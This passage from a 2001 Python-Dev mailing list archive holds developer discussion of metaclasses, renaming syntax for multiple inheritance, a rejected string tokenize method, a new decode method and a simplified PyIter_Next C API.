meta-class is in > > charge of a class which is derived from two classes having > > different meta-classes ? > > > > meta1 --> o klass1 > > o klass1a > > o klass1b > > meta2 --> o klass2 > > o klass2a > > o klass2b > > > > class klass3(klass1a, klass2b): > > ... > > > > I think there's no clean way to resolve this, so I'd suggest > > to simply rule this out and declare it illegal (class can > > only be based on classes having the same meta-class). > > Unfortunately, again thanks to Jim Fulton, we can't rule this out, > because this is actually used by ExtensionClasses. The rule (as I > interpret it) gives the first base class control; if the first base > class is a standard class, it looks if any of the other base classes > are not standard classes, and if so, gives control to the first such > base class. Another way to say this is that the first base class that > has a non-standard metaclass gets control. Ouch. Still, since Jim's in control of ExtensionClass -- wouldn't it be possible to adapt ExtensionClass to an altered scheme ? > (ExtensionClasses implements an additional rule where it requires all > except one of the base classes to define no instance variables. This > is an example of the importance of metaclasses done right: the > metaclass has control over such issues. I don't think that > Smalltalk's metaclasses have this much control -- you pretty much have > a 1-1 correspondence between class and metaclass. Right: more power to the meta-class :-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From paul@pfdubois.com Thu May 3 17:24:40 2001 From: paul@pfdubois.com (Paul F. Dubois) Date: Thu, 3 May 2001 09:24:40 -0700 Subject: [Python-Dev] Multiple inheritance Message-ID: Pardon if this is brief and suggestive only, I am on deadlines. Super is a mistaken concept in multiple inheritance languages. Fortunately, Python is not brain-damaged. Its multiple inheritance model can be fixed easily to be fully capable. Here is a suggestive example of implementing the Eiffel model (the only one that is theoretically sound) using "pretend" Python syntax (keyword conservationists might like "import" where I have "rename"): 1. The simple case, X inherits from Y and in defining foo and bar needs to use Y's version: class X (Y rename foo as _sfoo, bar as _sbar ): def foo (self): self._sfoo() myfoostuff Suppose D inherits from B and C, which both inherit from A. A has a method a1 that is redefined in B but not in C. D wishes to use both A's version as inherited via C and B's version. class D (B rename a1 as ba1, C rename a1 as ca1): can now use self.ca1, self.a1 Renaming is also useful where you inherit from a utility class and the lingo is different in the class where you want to use it. E.g. class Window (Tree rename children as subWindows) Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition. From Donald Beaudry Thu May 3 17:47:29 2001 From: Donald Beaudry (Donald Beaudry) Date: Thu, 03 May 2001 12:47:29 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: Message-ID: <200105031647.MAA25803@localhost.localdomain> "Tim Peters" wrote, > Given that we're using Python's search rules, the ambiguous point remaining > is whether: > > super.f() > > textually contained in a method of class K begins searching with: > > 1) K.__bases__ > > or with: > > 2) self.__class__.__bases__ It can only be 1. The using 2 will only be correct if you are in a method defined on a leaf class. If not in a leaf, the search will find the method you are already in... recursion is likely to terminate in a stack overflow ;) -- Donald Beaudry Ab Initio Software Corp. 201 Spring Street donb@init.com Lexington, MA 02421 ...So much code, so little time... From guido@digicool.com Thu May 3 19:48:19 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 14:48:19 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT." References: Message-ID: <200105031848.f43ImKg14308@odiug.digicool.com> From guido@digicool.com Thu May 3 19:50:30 2001 From: guido@digicool.com (Guido van Rossum) Date: Thu, 03 May 2001 14:50:30 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT." References: Message-ID: <200105031850.f43IoVf14328@odiug.digicool.com> > Pardon if this is brief and suggestive only, I am on deadlines. No problem. We appreciate it! > Super is a mistaken concept in multiple inheritance languages. Fortunately, > Python is not brain-damaged. Its multiple inheritance model can be fixed > easily to be fully capable. > > Here is a suggestive example of implementing the Eiffel model (the only one > that is theoretically sound) using "pretend" Python syntax (keyword > conservationists might like "import" where I have "rename"): > > > 1. The simple case, X inherits from Y and in defining foo and bar needs to > use Y's version: > > class X (Y rename foo as _sfoo, > bar as _sbar > ): > def foo (self): > self._sfoo() > myfoostuff Nice! This is similar to Jeremy's favorite way of spelling "super": class X(Y): Yfoo = Y.foo def foo(self): self.Yfoo() myfoostuff > Suppose D inherits from B and C, which both inherit from A. > A has a method a1 that is redefined in B but not in C. > D wishes to use both A's version as inherited via C and B's version. > > class D (B rename a1 as ba1, C rename a1 as ca1): > > can now use self.ca1, self.a1 > > Renaming is also useful where you inherit from a utility class and the lingo > is different in the class where you want to use it. E.g. class Window (Tree > rename children as subWindows) > > Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition. Yes. --Guido van Rossum (home page: http://www.python.org/~guido/) From jepler@inetnebr.com Thu May 3 19:17:16 2001 From: jepler@inetnebr.com (Jeff Epler) Date: Thu, 3 May 2001 13:17:16 -0500 Subject: [Python-Dev] Multiple inheritance In-Reply-To: ; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700 References: Message-ID: <20010503131714.D21814@inetnebr.com> On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote: > class X (Y rename foo as _sfoo, > bar as _sbar > ): Why not let us spell this as: class X(Y): from Y import foo as _sfoo, bar as _sbar ... Of course, then you can spell inheritance as class X: from Y import * Right? :) Jeff From nas@python.ca Thu May 3 20:05:37 2001 From: nas@python.ca (Neil Schemenauer) Date: Thu, 3 May 2001 12:05:37 -0700 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <20010503131714.D21814@inetnebr.com>; from jepler@inetnebr.com on Thu, May 03, 2001 at 01:17:16PM -0500 References: <20010503131714.D21814@inetnebr.com> Message-ID: <20010503120537.A13708@glacier.fnational.com> Jeff Epler wrote: > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote: > > class X (Y rename foo as _sfoo, > > bar as _sbar > > ): > > Why not let us spell this as: > class X(Y): > from Y import foo as _sfoo, bar as _sbar > ... This already has a meaning in Python. Paul's suggested syntax is pretty neat, IMHO. Neil From trentm@ActiveState.com Thu May 3 20:39:27 2001 From: trentm@ActiveState.com (Trent Mick) Date: Thu, 3 May 2001 12:39:27 -0700 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <20010503120537.A13708@glacier.fnational.com>; from nas@python.ca on Thu, May 03, 2001 at 12:05:37PM -0700 References: <20010503131714.D21814@inetnebr.com> <20010503120537.A13708@glacier.fnational.com> Message-ID: <20010503123927.B30837@ActiveState.com> On Thu, May 03, 2001 at 12:05:37PM -0700, Neil Schemenauer wrote: > Jeff Epler wrote: > > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote: > > > class X (Y rename foo as _sfoo, > > > bar as _sbar > > > ): > > > > Why not let us spell this as: > > class X(Y): > > from Y import foo as _sfoo, bar as _sbar > > ... > > This already has a meaning in Python. Paul's suggested syntax is > pretty neat, IMHO. Ditto but how to you separate the "rename" lists for multiple inheritance? class X (Y rename foo as _sfoo, bar as _sbar; Z): pass ^---- what to use here How about: class X(Y, Z): from Y inherit foo as _yfoo, bar as _ybar from Z inherit foo as _zfoo, bar as _zbar Hmmmmm. Don't know if I like that either. Just throwing out ideas. Trent -- Trent Mick TrentM@ActiveState.com From greg@cosc.canterbury.ac.nz Fri May 4 05:25:08 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 04 May 2001 16:25:08 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AF1827E.E730F5DE@lemburg.com> Message-ID: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > I think it has to do with terminology: when I say "inherit" > I actually mean "the lookup is forwarded to the another object". Some OO languages munge together the instance and inheritance relationships, but Python isn't one of them. Using terminology that way in the context of Python is guaranteed to cause massive confusion! Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Fri May 4 05:58:20 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Fri, 04 May 2001 16:58:20 +1200 (NZST) Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk) In-Reply-To: Message-ID: <200105040458.QAA16653@s454.cosc.canterbury.ac.nz> pf@artcom-gmbh.de (Peter Funk): > * People will confuse this with calling > MyBaseClass.__getitem__(....) Given type/class/instance unification, that's exactly how it'll be implemented. So it's not confusion, it's insightful understanding! > This '::' operator is not at all that ugly Well, that's a matter of opinion. But I'll concede that it's less ugly than something like @ or $. But in any case, it's not going to mean quite the same thing in Python as it does in C++, so it might just confuse C++ people. What exactly *is* it going to mean in Python, anyway? Will it have a corresponding __magic__ method, and if so, what will it be called? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From mal@lemburg.com Fri May 4 09:40:17 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 10:40:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz> Message-ID: <3AF26AF1.780462E2@lemburg.com> Greg Ewing wrote: > > "M.-A. Lemburg" : > > > I think it has to do with terminology: when I say "inherit" > > I actually mean "the lookup is forwarded to the another object". > > Some OO languages munge together the instance and inheritance > relationships, but Python isn't one of them. Using terminology > that way in the context of Python is guaranteed to cause > massive confusion! But that's exactly what I am trying to do here: separate the notion of how lookups work (inheritance) from how objects are created (instantiation) ! In Python instantiation binds the new object to the creating class and all failing lookups are directed from the object to the class. OTOH, the class - base-class lookup relationship doesn't have anything to do creation of objects -- classes are simply bound to their base-classes per definition of the class in the sense that failing lookups are directed to the base-classes. Classes themselves are created by meta-classes. The lookup strategy between the two is defined by the meta-class. What I'm argueing for is that meta-classes should get complete control over how lookups and object creation are done. However, this will only be possible by breaking the current automatic lookup scheme at the meta-class - class boundary since otherwise you'd run into endless loops during lookups (e.g. for many of the __xxx__ methods). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Fri May 4 10:04:08 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 11:04:08 +0200 Subject: [Python-Dev] "".tokenize() ? Message-ID: <3AF27088.DE495210@lemburg.com> Gustavo Niemeyer submitted a patch which adds a tokenize like method to strings and Unicode: "one, two and three".tokenize([",", "and"]) -> ["one", " two ", "three"] I like this method -- should I review the code and then check it in ? PS: Haven't gotten any response regarding the .decode() method yet... should I take this as "no objections" ? -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik@pythonware.com Fri May 4 10:57:19 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Fri, 4 May 2001 11:57:19 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> Message-ID: <017301c0d480$9d445f20$0900a8c0@spiff> mal wrote: > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? -1. method bloat. not exactly something you do every day, and when you do, it's a one-liner: def tokenize(string, ignore): [word for word in re.findall("\w+", string) if not word in ignore] > PS: Haven't gotten any response regarding the .decode() method yet... > should I take this as "no objections" ? -0. method bloat. we don't have asfloat methods on integers and asint methods on strings either... Cheers /F From mal@lemburg.com Fri May 4 11:16:16 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 04 May 2001 12:16:16 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> Message-ID: <3AF28170.399C2A5@lemburg.com> Fredrik Lundh wrote: > > mal wrote: > > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > -1. method bloat. not exactly something you do every day, and > when you do, it's a one-liner: > > def tokenize(string, ignore): > [word for word in re.findall("\w+", string) if not word in ignore] This is not the same as what .tokenize() does: it cut at each occurrance of a substring rather than words as in your example (although I must say that list comprehension looks cool ;-). > > PS: Haven't gotten any response regarding the .decode() method yet... > > should I take this as "no objections" ? > > -0. method bloat. we don't have asfloat methods on integers and > asint methods on strings either... Well, we already have .encode() which interfaces to PyString_Encode(), but no Python API for getting at PyString_Decode(). This is what .decode() is for. Depending on the codecs you use, these two methods can be very useful, e.g. for "fixing" line-endings or hexifying strings. The codec concept can be used for far more applications than just converting from and to Unicode. About rich method APIs in general: I like having rich method APIs, since they make life easier (you don't have to reinvent the wheel everytime you want a common job to be done). IMHO, too many methods can never hurt, but I'm probably alone with that POV. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik@pythonware.com Fri May 4 11:50:06 2001 From: fredrik@pythonware.com (Fredrik Lundh) Date: Fri, 4 May 2001 12:50:06 +0200 Subject: [Python-Dev] "".tokenize() ? References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> <3AF28170.399C2A5@lemburg.com> Message-ID: <01c801c0d487$fb94f290$0900a8c0@spiff> mal wrote: > > > "one, two and three".tokenize([",", "and"]) > > > -> ["one", " two ", "three"] > > > > > > I like this method -- should I review the code and then check it in ? > > > > -1. method bloat. not exactly something you do every day, and > > when you do, it's a one-liner: > > > > def tokenize(string, ignore): > > [word for word in re.findall("\w+", string) if not word in ignore] > > This is not the same as what .tokenize() does: it cut at each > occurrance of a substring rather than words as in your example oh, I didn't see the spaces. splitting on all substrings is even easier (but perhaps a bit more obscure, at least when written on one line): def tokenize(string, seps): return re.split("|".join(map(re.escape, seps)), string) Cheers /F From lkcl@samba-tng.org Fri May 4 12:31:29 2001 From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton) Date: Fri, 4 May 2001 13:31:29 +0200 Subject: [Python-Dev] [noreply@sourceforge.net: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn] Message-ID: <20010504133129.K26116@angua.rince.de> hi there, i thought it best to bring this to someone's attention. the forkingmixin code keeps track of its children, plus because it forks, there's no close_requests() to interfere with the operation of the child etc. etc. now, for some marginally bizarre reason, adding an extra base class - BaseServer - has, i believe (without proof, just a hunch), caused a bug in ThreadingMixIn to be more likely to occur. now, i wrote BaseServer in order to be able to overload this for a server that reads from a SQL server table and performs actions based on what it reads from there (the name of a host and the name of a python script to action on the host, from the database :) :) ... but i don't do threading. python is my first actual exposure to thread programming. does anyone have enough experience with threads to write something in less lines and less time than this message? all best, luke ----- Forwarded message from noreply@sourceforge.net ----- Delivered-To: lkcl@angua.rince.de Delivered-To: lkcl@samba.org To: noreply@sourceforge.net From: noreply@sourceforge.net Subject: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn Date: Thu, 03 May 2001 16:26:12 -0700 Bugs item #417845, was updated on 2001-04-21 08:28 You can respond by visiting: http://sourceforge.net/tracker/?func=detail&atid=105470&aid=417845&group_id=5470 Category: Python Library Group: None Status: Open Resolution: None Priority: 5 Submitted By: Nobody/Anonymous (nobody) Assigned to: Guido van Rossum (gvanrossum) Summary: Python 2.1: SocketServer.ThreadingMixIn Initial Comment: SocketServer.ThreadingMixIn does not work properly since it tries to close the socket of a request two times. From gward@python.net Fri May 4 19:12:44 2001 From: gward@python.net (Greg Ward) Date: Fri, 4 May 2001 14:12:44 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: ; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700 References: Message-ID: <20010504141244.A1167@gerg.ca> On 03 May 2001, Paul F. Dubois said: > 1. The simple case, X inherits from Y and in defining foo and bar needs to > use Y's version: > > class X (Y rename foo as _sfoo, > bar as _sbar > ): Maybe I'm being thick, but don't you get the same effect by doing this: class X (Y): _sfoo = Y.foo _sbar = Y.bar ...or would the "rename" syntax also hide the "foo" and "bar" names from X's effective namespace[1]? In that case, I guess some special syntax is needed. [1] "effective namespace" -- the union of X's class dict with all its superclass' dicts; not actually X's namespace, but the set of names you can use in X. I think. Err, whatever. Greg From gward@python.net Fri May 4 19:15:51 2001 From: gward@python.net (Greg Ward) Date: Fri, 4 May 2001 14:15:51 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: <3AF27088.DE495210@lemburg.com>; from mal@lemburg.com on Fri, May 04, 2001 at 11:04:08AM +0200 References: <3AF27088.DE495210@lemburg.com> Message-ID: <20010504141551.B1167@gerg.ca> On 04 May 2001, M.-A. Lemburg said: > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? I concur with /F: -1 because you can do it easily with re.split(). Greg -- Greg Ward - Unix bigot gward@python.net http://starship.python.net/~gward/ I hope something GOOD came in the mail today so I have a REASON to live!! From guido@digicool.com Fri May 4 19:36:14 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 14:36:14 -0400 Subject: [Python-Dev] Multiple inheritance In-Reply-To: Your message of "Fri, 04 May 2001 14:12:44 EDT." <20010504141244.A1167@gerg.ca> References: <20010504141244.A1167@gerg.ca> Message-ID: <200105041836.f44IaEd29787@odiug.digicool.com> > On 03 May 2001, Paul F. Dubois said: > > 1. The simple case, X inherits from Y and in defining foo and bar needs to > > use Y's version: > > > > class X (Y rename foo as _sfoo, > > bar as _sbar > > ): [Greg Ward] > Maybe I'm being thick, but don't you get the same effect by doing this: > > class X (Y): > _sfoo = Y.foo > _sbar = Y.bar > > ...or would the "rename" syntax also hide the "foo" and "bar" names from > X's effective namespace[1]? In that case, I guess some special syntax > is needed. Paul's point is that the rename thing makes it possible to deprecate the form Y.foo, which is causing the basic ambiguity here. > [1] "effective namespace" -- the union of X's class dict with all its > superclass' dicts; not actually X's namespace, but the set of names you > can use in X. I think. Err, whatever. Probably irrelevant. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Fri May 4 19:38:06 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 14:38:06 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: Your message of "Fri, 04 May 2001 14:15:51 EDT." <20010504141551.B1167@gerg.ca> References: <3AF27088.DE495210@lemburg.com> <20010504141551.B1167@gerg.ca> Message-ID: <200105041838.f44Ic6p29802@odiug.digicool.com> > On 04 May 2001, M.-A. Lemburg said: > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > I concur with /F: -1 because you can do it easily with re.split(). -1 also. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Fri May 4 19:51:26 2001 From: tim.one@home.com (Tim Peters) Date: Fri, 4 May 2001 14:51:26 -0400 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: <3AF27088.DE495210@lemburg.com> Message-ID: [MAL] > Gustavo Niemeyer submitted a patch which adds a tokenize like > method to strings and Unicode: > > "one, two and three".tokenize([",", "and"]) > -> ["one", " two ", "three"] > > I like this method -- should I review the code and then check it in ? -1 here. Easily enough done via other means, and you just *know* different people will want different variants of tokenization (e.g., nobody in their right mind will want " two " coming back from that example, and, given that it does, that it doesn't also return " three" is baffling). > PS: Haven't gotten any response regarding the .decode() method yet... > should I take this as "no objections" ? +1 from me: it's the other half of the existing .encode() method, and the current lack of symmetry is icky. From barry@digicool.com Fri May 4 19:57:09 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Fri, 4 May 2001 14:57:09 -0400 Subject: [Python-Dev] Multiple inheritance References: <20010503131714.D21814@inetnebr.com> Message-ID: <15090.64389.746625.331215@anthem.wooz.org> >>>>> "JE" == Jeff Epler writes: >> class X (Y rename foo as _sfoo, bar as _sbar ): | Why not let us spell this as: | class X(Y): | from Y import foo as _sfoo, bar as _sbar | ... >>>>> "NS" == Neil Schemenauer writes: NS> This already has a meaning in Python. Paul's suggested syntax NS> is pretty neat, IMHO. Not if Y is a class though, right? That would currently raise an ImportError, so why not hijack it for this purpose? I think it has a natural and clear enough meaning without requiring additional keywords, or complicating the base class specification syntax. -Barry From tim.one@home.com Fri May 4 21:50:03 2001 From: tim.one@home.com (Tim Peters) Date: Fri, 4 May 2001 16:50:03 -0400 Subject: [Python-Dev] Change to PyIter_Next()? Message-ID: In spare moments, I've been plugging away at making various functions work nice with iterators (map, min, max, etc). Over and over this requires writing code of the form: op2 = PyIter_Next(it); if (op2 == NULL) { /* StopIteration is *implied* by a NULL return from * PyIter_Next() if PyErr_Occurred() is false. */ if (PyErr_Occurred()) { if (PyErr_ExceptionMatches(PyExc_StopIteration)) PyErr_Clear(); else goto Fail; } break; } This is wordy, obscure, and in my experience is needed every time I call PyIter_Next(). So I'd like to hide this in PyIter_Next instead, like so: /* Return next item. * If an error occurs, return NULL and set *error=1. * If the iteration terminated normally, return NULL and set *error=0. * Else return the next object and set *error=0. */ PyObject * PyIter_Next(PyObject *iter, int *error) { PyObject *result; if (!PyIter_Check(iter)) { PyErr_Format(PyExc_TypeError, "'%.100s' object is not an iterator", iter->ob_type->tp_name); *error = 1; return NULL; } result = (*iter->ob_type->tp_iternext)(iter); *error = 0; if (result) return result; if (PyErr_Occurred()) { if (PyErr_ExceptionMatches(PyExc_StopIteration)) PyErr_Clear(); else *error = 1; } /* Else StopIteration is implicit, and there is no error. */ return NULL; } Then *calls* could be the simpler: op2 = PyIter_Next(it, &error); if (op2 == NULL) { if {error) goto Fail; break; } Objections? So far I'm almost the only user of PyIter_Next(); the only other use is in ceval's FOR_ITER, which goes thru a similar dance. However, I'm not clear on why FOR_ITER doesn't clear the exception if PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both true -- that sure smells like a bug (but, if so, the change above would squash it by magic). Note that I'm not proposing to change the signature of the tp_iternext slot similarly. PyIter_Next() is a (IMO appropriately) higher-level function. From guido@digicool.com Fri May 4 23:03:36 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 17:03:36 -0500 Subject: [Python-Dev] Change to PyIter_Next()? In-Reply-To: Your message of "Fri, 04 May 2001 16:50:03 -0400." References: Message-ID: <200105042203.RAA12278@cj20424-a.reston1.va.home.com> > In spare moments, I've been plugging away at making various functions work > nice with iterators (map, min, max, etc). For which efforts I extend my greatest thanks! > Over and over this requires writing code of the form: > [etc.] > > This is wordy, obscure, and in my experience is needed every time I call > PyIter_Next(). > > So I'd like to hide this in PyIter_Next instead, like so: > > /* Return next item. > * If an error occurs, return NULL and set *error=1. > * If the iteration terminated normally, return NULL and set *error=0. > * Else return the next object and set *error=0. > */ > PyObject * > PyIter_Next(PyObject *iter, int *error) > { [etc.] > } > Then *calls* could be the simpler: > > op2 = PyIter_Next(it, &error); > if (op2 == NULL) { > if {error) > goto Fail; > break; > } I originally had this API for tp_iternext, and changed it to the current API because I got tired of having to declare the error variable. How about making PyIter_Next() call PyErr_Clear() when the exception is StopIteration? Then calls could be op2 = PyIter_Next(it); if (op2 == NULL) { if (PyErr_Occurred()) goto Fail; break; } This is a tad slower and arguably generates more code (assuming an extra call is slower than passing an extra argument and loading it) but doesn't require declaring the error variable. But since you're the customer, it's your choice. > Objections? So far I'm almost the only user of PyIter_Next(); the only other > use is in ceval's FOR_ITER, which goes thru a similar dance. > > However, I'm not clear on why FOR_ITER doesn't clear the exception if > PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both > true -- that sure smells like a bug (but, if so, the change above would > squash it by magic). Smells like a bug indeed. > Note that I'm not proposing to change the signature of the tp_iternext slot > similarly. PyIter_Next() is a (IMO appropriately) higher-level function. Agreed. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Fri May 4 22:18:16 2001 From: tim.one@home.com (Tim Peters) Date: Fri, 4 May 2001 17:18:16 -0400 Subject: [Python-Dev] Change to PyIter_Next()? In-Reply-To: <200105042203.RAA12278@cj20424-a.reston1.va.home.com> Message-ID: [Tim] >> In spare moments, I've been plugging away at ... iterators [Guido] > For which efforts I extend my greatest thanks! Yet but a pale reflection of the thanks I extend to you for implementing these guys to begin with: they're *loads* of fun! But not nearly as much fun as playing with Perl, so they're still prudently Pythonic . [T proposed adding a int* error arg to PyIter_Next()] [G] > How about making PyIter_Next() call PyErr_Clear() when the exception > is StopIteration? > > Then calls could be > > op2 = PyIter_Next(it); > if (op2 == NULL) { > if (PyErr_Occurred()) > goto Fail; > break; > } Perfect. I'll do that later tonight, and update the PEP to match. > This is a tad slower and arguably generates more code (assuming an > extra call is slower than passing an extra argument and loading it) > but doesn't require declaring the error variable. Well, it's two more calls (since PyErr_Occurred() also makes a call to get the thread state), but I don't really care because the client only does this in case of error or end-of-iteration (which aren't the normal cases). I was dreading finding a spare int var to pass inside FOR_ITER anyway . From paulp@ActiveState.com Sat May 5 01:03:05 2001 From: paulp@ActiveState.com (Paul Prescod) Date: Fri, 04 May 2001 17:03:05 -0700 Subject: [Python-Dev] :: Message-ID: <3AF34339.9C553704@ActiveState.com> I'll throw out a partially formed thought in case it is useful to anybody. "::" might be useful to solve another problem I've been struggling with: how to have multiple package distributions share a namespace (xml::dom::minidom, xml::dom::4dom, xml::dom::corbadom). "::" might mean, in general, that you are walking through abstract, potentially merged namespaces and not through concrete dictionary implementations. I think that Python's using the same syntax for package namespaces and attribute accesses might seem more elegant than it is in practice. Things that "seem like" they should work do not because packages are fundamentally different than attributes: >>> from xml import dom.minidom File "", line 1 from xml import dom.minidom ^ SyntaxError: invalid syntax Why isn't this symmetric? I would like to use "." on either side of the import >>> import xml >>> print xml.dom Traceback (most recent call last): File "", line 1, in ? AttributeError: 'xml' module has no attribute 'dom' >>> from xml.dom import minidom >>> print xml.dom I find it a little bit weird that importing one module has the side effect of populating a package. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From guido@digicool.com Sat May 5 04:07:56 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 04 May 2001 22:07:56 -0500 Subject: [Python-Dev] :: In-Reply-To: Your message of "Fri, 04 May 2001 17:03:05 MST." <3AF34339.9C553704@ActiveState.com> References: <3AF34339.9C553704@ActiveState.com> Message-ID: <200105050307.WAA13735@cj20424-a.reston1.va.home.com> > I find it a little bit weird that importing one module has the side > effect of populating a package. That's just because you've seen too much Java. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Sat May 5 09:13:30 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sat, 05 May 2001 10:13:30 +0200 Subject: [Python-Dev] "".tokenize() ? References: Message-ID: <3AF3B62A.50DD4115@lemburg.com> Tim Peters wrote: > > [MAL] > > Gustavo Niemeyer submitted a patch which adds a tokenize like > > method to strings and Unicode: > > > > "one, two and three".tokenize([",", "and"]) > > -> ["one", " two ", "three"] > > > > I like this method -- should I review the code and then check it in ? > > -1 here. Easily enough done via other means, and you just *know* different > people will want different variants of tokenization (e.g., nobody in their > right mind will want " two " coming back from that example, and, given that > it does, that it doesn't also return " three" is baffling). Ok. I rejected the patch with a mild response to take on this by subclassing strings in Python 2.2 ;-) > > PS: Haven't gotten any response regarding the .decode() method yet... > > should I take this as "no objections" ? > > +1 from me: it's the other half of the existing .encode() method, and the > current lack of symmetry is icky. Right. If I here no strong objections, I'll check in the .decode() method next week. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Sat May 5 12:45:26 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 06:45:26 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 21:55:25 +0200." <3AF0662D.48671B4E@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <200105051145.GAA14831@cj20424-a.reston1.va.home.com> > I've attached the patch. Due to a small reorganisation the > patch is a little longer -- symmetry has its price at C level > too ;-) Looks good on paper, so go ahead and check it in. Watch out for potential changes caused by Tim's iter-crusade! :-) While you're at it, why don't you check in the rot13 codec you posted -- it's good to have simle examples in the standard library. It would also be cool to have codecs for common file encodings like base64, quoted-printable, binhex, uuencode, and even hex (binascii.hexlify). --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Sat May 5 13:15:52 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 07:15:52 -0500 Subject: [Python-Dev] "".tokenize() ? In-Reply-To: Your message of "Sat, 05 May 2001 10:13:30 +0200." <3AF3B62A.50DD4115@lemburg.com> References: <3AF3B62A.50DD4115@lemburg.com> Message-ID: <200105051215.HAA14912@cj20424-a.reston1.va.home.com> > Ok. I rejected the patch with a mild response to take on this by > subclassing strings in Python 2.2 ;-) Gustavo didn't take the rejection well. He contacted me asking for a better explanation, and we got into a bit of an argument about how much I must explain my decisions, but I think hge understands now. > If I here no strong objections, I'll check in the .decode() > method next week. Yes, see my previous reply. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Sat May 5 13:24:19 2001 From: guido@digicool.com (Guido van Rossum) Date: Sat, 05 May 2001 07:24:19 